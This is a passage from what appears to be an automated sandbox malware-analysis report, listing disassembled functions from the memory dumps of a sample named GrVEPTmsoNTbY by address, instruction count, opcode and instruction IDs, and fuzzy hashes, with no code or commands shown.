                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 304203d26f9ad2f588cb475f33cb5ec95d0526629884315db941a2aaae1cd177
                                                      • Instruction ID: de1641b19c938d4e14d36344db1ae1ca742f266711d162cc78a886fe7958a291
                                                      • Opcode Fuzzy Hash: 304203d26f9ad2f588cb475f33cb5ec95d0526629884315db941a2aaae1cd177
                                                      • Instruction Fuzzy Hash: 661136316085188FDB58EF18D895AA9B7F2FF59311F1141AFD04ED7662CB31AD41CB40
                                                      Function 00007FF849273E50 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 672b9bcf87361f4af86a58824f45cbcccf2f15d4db2978db08e23cb68e86ef68
                                                      • Instruction ID: 48ddee4514c5d8922fa5f7e33a2ebcbd168e7b5b616ed36f7ec6f17d713923b6
                                                      • Opcode Fuzzy Hash: 672b9bcf87361f4af86a58824f45cbcccf2f15d4db2978db08e23cb68e86ef68
                                                      • Instruction Fuzzy Hash: 7511DB2091C4B78FF638AE0C74605B67763FF64381B1489B5D46B9B086C938B8819781
                                                      Function 00007FF849278EA0 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2f5065db4b7455ff8734b4eef47fcc674928181e3ba3679fa6db2472a4de46a
                                                      • Instruction ID: 95d60d157b18c773d2057e7285685ef739d33ed07576ee07d873b5a42262d14a
                                                      • Opcode Fuzzy Hash: b2f5065db4b7455ff8734b4eef47fcc674928181e3ba3679fa6db2472a4de46a
                                                      • Instruction Fuzzy Hash: 87110D1091C8B78FF638DA0440E05B47693EF943517544EF5D47F9758AC93CB9809392
                                                      Function 00007FF849272ED0 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2f005747cf56bd2cb25865519cc06012fb6c163a49e68d0affa554c5c407bbf
                                                      • Instruction ID: 5c77a31291a53b24fdaaec9913897401dd6ecd527f07d8faf1c26ee9b48170ec
                                                      • Opcode Fuzzy Hash: a2f005747cf56bd2cb25865519cc06012fb6c163a49e68d0affa554c5c407bbf
                                                      • Instruction Fuzzy Hash: 2C11C121A0DA4A4FEB68FB2494405F973D1FF54392F400A7AD44EC35C2DF2DB9498761
                                                      Function 00007FF849277F20 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec0f06c3fa9919ef069b7b0b7f42137628384d3cbf877f91ca81167812ffc693
                                                      • Instruction ID: 46187aa69c490f763b2f6a25b7ad27cea9430b82739eba4ff4478ae1ee887001
                                                      • Opcode Fuzzy Hash: ec0f06c3fa9919ef069b7b0b7f42137628384d3cbf877f91ca81167812ffc693
                                                      • Instruction Fuzzy Hash: 2411C121A0D94A4FEB64FB24D8415F973D1FF65391F400A7AD44EC35C2DF28B9098761
                                                      Function 00007FF84927CF5C Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e14ffd24cc22c6d7b690c06ac515a5ab4acd6176964cc0f8666c245657e4a8d
                                                      • Instruction ID: 9fed62821ecd246d710f75e72958f2684e0870589feb8e95aa026ddcb65058fb
                                                      • Opcode Fuzzy Hash: 7e14ffd24cc22c6d7b690c06ac515a5ab4acd6176964cc0f8666c245657e4a8d
                                                      • Instruction Fuzzy Hash: E0117331A0D6588FEB58EF28D8966B8B3E2EF59351F0001BBD05ED76A2CB2569418B01
                                                      Function 00007FF84927C179 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b142ae1d1c81250891da5655c38f7133445bd5e6b966c81b1ca0c94e76805d88
                                                      • Instruction ID: 7115716a6a36987b96b9b92c7fbced53839c60d516a607959a61a03862a861d8
                                                      • Opcode Fuzzy Hash: b142ae1d1c81250891da5655c38f7133445bd5e6b966c81b1ca0c94e76805d88
                                                      • Instruction Fuzzy Hash: 3F118F51D0E5F39FF279FD7828210BC5642AF417A0F1801F6D82EB62C6DD4C29816292
                                                      Function 00007FF84927E10C Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a47db59ad69f82a953d4f87607759c0e585026be3272eed0a3a49b0b6771d76f
                                                      • Instruction ID: 6443b5fe87859ac13af8d4d7f9e298f3171afe870b1953e9d5bbcfea43bad246
                                                      • Opcode Fuzzy Hash: a47db59ad69f82a953d4f87607759c0e585026be3272eed0a3a49b0b6771d76f
                                                      • Instruction Fuzzy Hash: 3611293190EAA65FEB55BA3098055F97791EF513A1F4009BBD44ECB4D3CF2C690587B0
                                                      Function 00007FF84927BA60 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1e604368684a5caec56457d79be9591747802f6bce28bb3ed7f8364ea7d086b1
                                                      • Instruction ID: 0ff8d4196fb1cda9560b377e210e6d1268b6e6b64d7d5840e9cd82e4adba56d9
                                                      • Opcode Fuzzy Hash: 1e604368684a5caec56457d79be9591747802f6bce28bb3ed7f8364ea7d086b1
                                                      • Instruction Fuzzy Hash: 3F11F2A144E7C11FE3139B7848295913FB09E27515B4E82EFD4C9CF4B3E64A884AC322
                                                      Function 00007FF8492762B0 Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0fe95ebf67e57dfd83c3686e4092795ac9915d126ae09b6f41b49f9921c16d7b
                                                      • Instruction ID: de136a321b4a4fed14bdba28dee0c0a34d35674dcb652d79a13d14f11873ba89
                                                      • Opcode Fuzzy Hash: 0fe95ebf67e57dfd83c3686e4092795ac9915d126ae09b6f41b49f9921c16d7b
                                                      • Instruction Fuzzy Hash: D011D730E1885D9FDB9CEB18D4A5ABDB7B1FB58310F0001BED01EE3695CE3569408B51
                                                      Function 00007FF849272D4E Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62ab9142c94c26ed4894c9740c1b3f70e1b52fa17e07c5edbe380e5a433b4af6
                                                      • Instruction ID: 40fb591df8fbf8b9e5a0ca9508a177e292d3f2ebe0bec9c70cc097e9f0bc104e
                                                      • Opcode Fuzzy Hash: 62ab9142c94c26ed4894c9740c1b3f70e1b52fa17e07c5edbe380e5a433b4af6
                                                      • Instruction Fuzzy Hash: 0211043260D55B8FFB19BE18E8546E433D2EF543A1F00067BE92EC76C2DB29B9508750
                                                      Function 00007FF849277D9E Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5a50a8a167c605936c410ae149b03d6935c1eeb8243a0542af63023d94ce51d
                                                      • Instruction ID: 46c0486f4ba24c98aa627660cfedef32a288c9d04c9e75f1762fa4e7443c9b6f
                                                      • Opcode Fuzzy Hash: f5a50a8a167c605936c410ae149b03d6935c1eeb8243a0542af63023d94ce51d
                                                      • Instruction Fuzzy Hash: 4611083160D5468FFB19BE14D8556E533D5EFA43A1F00097BD829C76C1DB2969508750
                                                      Function 00007FF84927DF8E Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8af8dda4e0ebe95ce809974c2bb487d0de0adfae5a5b8dbce96e386d6b2144e1
                                                      • Instruction ID: 9f4b9746d56d6db7df8e716eb5471665b444f3efc58e1820010db4e2d2c27238
                                                      • Opcode Fuzzy Hash: 8af8dda4e0ebe95ce809974c2bb487d0de0adfae5a5b8dbce96e386d6b2144e1
                                                      • Instruction Fuzzy Hash: 6011483160D5464FFB68AE14D4552F473D2EF54391F00057BE819C72D2DB29A95087A0
                                                      Function 00007FF848E83D85 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 87ccee3160c49ecc59db1dc36c4f3b02e819a3a3840a9fd429d1897cd53cf98c
                                                      • Instruction ID: cbcdaa7fa77054551c4b1d76e8fc181bd9cb8a565532565ef62b439f10927ea4
                                                      • Opcode Fuzzy Hash: 87ccee3160c49ecc59db1dc36c4f3b02e819a3a3840a9fd429d1897cd53cf98c
                                                      • Instruction Fuzzy Hash: 6A11DA70908A198FDB94EB08C894FA9B3E1FB58311F5441AAD40DE7290CB74AEC4CF85
                                                      Function 00007FF848E80C38 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c8e71e527a25eb60cc7bead8d924e8a5263c10bd80aa7d004665807ae16341d
                                                      • Instruction ID: 3e2ee4ab451bbfa1aa9779ae36a969c299aecd2b97b891b4c87c5861ffc68329
                                                      • Opcode Fuzzy Hash: 9c8e71e527a25eb60cc7bead8d924e8a5263c10bd80aa7d004665807ae16341d
                                                      • Instruction Fuzzy Hash: 74118E31A0D68D9FE702FB28D8452EC7FB0FF42351F5546F6C084DB292DA3856498B95
                                                      Function 00007FF848E80C40 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7410dcb7c1c4af9ef551c4d3616ea0af4d1460fa92bfbc28acc681870fe0ae17
                                                      • Instruction ID: d85d40a25b7ff359e4467be9493c396adcc6bec3f2e1cfd15c1ab4406b8f88ac
                                                      • Opcode Fuzzy Hash: 7410dcb7c1c4af9ef551c4d3616ea0af4d1460fa92bfbc28acc681870fe0ae17
                                                      • Instruction Fuzzy Hash: 2D016931A0D6899FE702EB28C8542EDBFB0FF42350F5545E6C080DB292DA3856498B95
                                                      Function 00007FF8492714DB Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80fabe4b9087f5dd2f1114a752e1a5879f4daf4f587b0cfd7f5fd700fa8a961e
                                                      • Instruction ID: 222d6f39738ac6a1c03024213d767752bccf975e10638cb21ffee09225a0b72d
                                                      • Opcode Fuzzy Hash: 80fabe4b9087f5dd2f1114a752e1a5879f4daf4f587b0cfd7f5fd700fa8a961e
                                                      • Instruction Fuzzy Hash: E001E87090895C8FCF98EF18C895FE877B5EB98315F1401A9D40DE7291DA359AC1CB51
                                                      Function 00007FF8492714DA Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aab6e4b6d7efe8787ffc2767639e0480b0a10d805fe5d4930564690ffbd482b7
                                                      • Instruction ID: 4bb2b2088501826d6f163e0ca397b92693a0bdb0d729fff046020121580ea15e
                                                      • Opcode Fuzzy Hash: aab6e4b6d7efe8787ffc2767639e0480b0a10d805fe5d4930564690ffbd482b7
                                                      • Instruction Fuzzy Hash: 7C01E87090895CCFDF98EF58C899BE877B1EB68315F1401A9D40EE7291DA359AC1CB41
                                                      Function 00007FF848E80C48 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e420d1e6fe104e70cd10390f7e7ed5ef79254df7c0fb2f071e1fb7f4f16bc15a
                                                      • Instruction ID: 4417abdbef1c0bcda944008d119b87f96253d1a83ae4d7787a3e7108bee77af6
                                                      • Opcode Fuzzy Hash: e420d1e6fe104e70cd10390f7e7ed5ef79254df7c0fb2f071e1fb7f4f16bc15a
                                                      • Instruction Fuzzy Hash: 46015A7190D7899FE702EB68C84429DBFB0FF42354F5541EAD040DB292DA385A49CB91
                                                      Function 00007FF848E84F0E Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 54b810dada27c2c675a549504aa881d736fe9b89187c663837ba510662c5a2fd
                                                      • Instruction ID: e662429218b4277dcd6dadad6b4f0eb98ca788b786023255127f74b267f99496
                                                      • Opcode Fuzzy Hash: 54b810dada27c2c675a549504aa881d736fe9b89187c663837ba510662c5a2fd
                                                      • Instruction Fuzzy Hash: 7F018F31E0D9668FEB61FB64845467D7790FF59350FA401F6C44ED3282DF3929418745
                                                      Function 00007FF84927C782 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15b46b58e9dffb7f014f33eff122e76cb4bb52903dcaf32c0675fa2201ebfb24
                                                      • Instruction ID: 24ac6fab1a2b6d7ca55b4e3afdc7b40964741cda989ccef22c021bce270261f1
                                                      • Opcode Fuzzy Hash: 15b46b58e9dffb7f014f33eff122e76cb4bb52903dcaf32c0675fa2201ebfb24
                                                      • Instruction Fuzzy Hash: 6DF0F63284E2C6AFF326EF7088114E63FA8EF02250F1400F6D059870A3CA2D5A06C361
                                                      Function 00007FF849271552 Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6938e7114032d6ca709ec3a3bb645cafd990eac46cb685504a922e083678f4c
                                                      • Instruction ID: dcf3dc28f5a79f268c7f302f9d31b2a934ebdd430e11d73436f44854bb0f5264
                                                      • Opcode Fuzzy Hash: d6938e7114032d6ca709ec3a3bb645cafd990eac46cb685504a922e083678f4c
                                                      • Instruction Fuzzy Hash: C2F0C23184E2C59FE32AEF7088118A53FB5EF03240F0800FAE05ADB0A3C92D1646C362
                                                      Function 00007FF849276582 Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 823c46bae8095c0f55db2bf765a33a53e563436fb972835a88ffce5954adcffd
                                                      • Instruction ID: 2343f8d9af6c10afea445c0172306eb21b2a3f5f8a4611037a1fcd44c106f486
                                                      • Opcode Fuzzy Hash: 823c46bae8095c0f55db2bf765a33a53e563436fb972835a88ffce5954adcffd
                                                      • Instruction Fuzzy Hash: 78F0F63184E3C69FE716AF7088555E53FB1FF47240F0800FAE059CB0A2DA2C1A0AD762
                                                      Function 00007FF848E80C50 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa75ccdf2b3aab6d1bcac7b5f1374372c33f4688e5763f8caf0d010090a013f0
                                                      • Instruction ID: ae587d8c9fa2b10dad1bb3720a8f5794a80afbf83b356ebd189300f2151b1652
                                                      • Opcode Fuzzy Hash: fa75ccdf2b3aab6d1bcac7b5f1374372c33f4688e5763f8caf0d010090a013f0
                                                      • Instruction Fuzzy Hash: E8014B7090D7899FE712EB64848429DBFB0FF02354F5441E6D440DB292DA385A48C755
                                                      Function 00007FF848E82B3D Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: 897828f0cad2904c0c3f1e321a18de19ee6196dcc1b12444fcd6fbfab5531f45
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: 72F0313094C85E8EEBB4FA14C8446EC73A2FF90391F9441F5C00DD31A2DF7869818B48
                                                      Function 00007FF848E80B77 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e529a8971c0c08948b526ccec0418b06fdbf8e572ef88851ffba145a90c2298
                                                      • Instruction ID: 3d9fe52116f3cd3b994742c43faaa95fa8d6b8a69e088d83ccc2dfed2720d27b
                                                      • Opcode Fuzzy Hash: 9e529a8971c0c08948b526ccec0418b06fdbf8e572ef88851ffba145a90c2298
                                                      • Instruction Fuzzy Hash: 31F0E53525EA89DFD742AB3CC8A58D8BF60FF03204F5A02EAD089CB563C315585DCB41
                                                      Function 00007FF84927DF68 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30bd7d5b3af36e349625fda6dc9e677a9b1c12ef1ba266c76a25e41005ae373b
                                                      • Instruction ID: 45e9e578e1228b59eec68c4ba11a812fe092c981ee71f94858a8d1ce46ebabb0
                                                      • Opcode Fuzzy Hash: 30bd7d5b3af36e349625fda6dc9e677a9b1c12ef1ba266c76a25e41005ae373b
                                                      • Instruction Fuzzy Hash: D9F0E221D0D5E78EFB753D1099171F86A52EF113D0F6009B7D42ED60D2CE2D390142A2
                                                      Function 00007FF849277D78 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 73d9dd005ee61a25173903853929b20c3361d6dd475ed1a058e36ff8636a6022
                                                      • Instruction ID: 6f963a018d533ed4aac7182bad7f3f8d31409ae7ea2fbf0e3cbde3da00c9deec
                                                      • Opcode Fuzzy Hash: 73d9dd005ee61a25173903853929b20c3361d6dd475ed1a058e36ff8636a6022
                                                      • Instruction Fuzzy Hash: EEF08225A0D5978EFB757E1095162F9264AEF913D1F2008B6C42ED65C2CF2D3A015692
                                                      Function 00007FF848E83824 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: b1aa58225af30ef3009926a3ad24ed8b1d7ed8fd6556f6ede8ea2fe6e7ca0ed1
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: 5BE01A20E0C51A4FFB54F614C8517BD63A1FF98380FA000B8D92E936D2CF386D809A59
                                                      Function 00007FF84927BB1E Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6b8aba6d41a71da66f8d8ef6dd5c45cc5d648140ad06c86e18223b3c3c912b54
                                                      • Instruction ID: c012b6522baa09908b7000f587a9b6d76d206a76286b94d2997c3771b9e9ca13
                                                      • Opcode Fuzzy Hash: 6b8aba6d41a71da66f8d8ef6dd5c45cc5d648140ad06c86e18223b3c3c912b54
                                                      • Instruction Fuzzy Hash: A3D05E50E0D8E69FF268AB2800223B52193EF88B90F0410B8D80E932CBCD282C404596
                                                      Function 00007FF84927D47D Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c2c2f232f6599547f8958c113e2e921ddb442c2460ef9bc1d9884322eb2630b
                                                      • Instruction ID: e1ba9cecd8bb9013809f3ec7d7455e69680fc6510e9fa26aa8fa9f77378f6034
                                                      • Opcode Fuzzy Hash: 9c2c2f232f6599547f8958c113e2e921ddb442c2460ef9bc1d9884322eb2630b
                                                      • Instruction Fuzzy Hash: 12D0A742E1D3E36FF77B36744C7013909C68F87380B4402B7D019AB2C3DE4838085266
                                                      Function 00007FF848E81953 Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
